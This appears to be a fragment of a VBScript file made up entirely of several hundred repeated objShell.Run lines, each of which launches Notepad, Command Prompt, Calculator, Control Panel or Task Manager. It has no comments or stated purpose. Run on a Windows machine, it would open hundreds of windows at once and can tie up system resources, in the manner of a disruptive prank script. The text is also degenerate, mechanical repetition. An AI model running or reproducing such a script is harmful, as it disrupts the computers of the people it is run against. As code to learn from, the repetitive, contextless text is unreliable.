objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
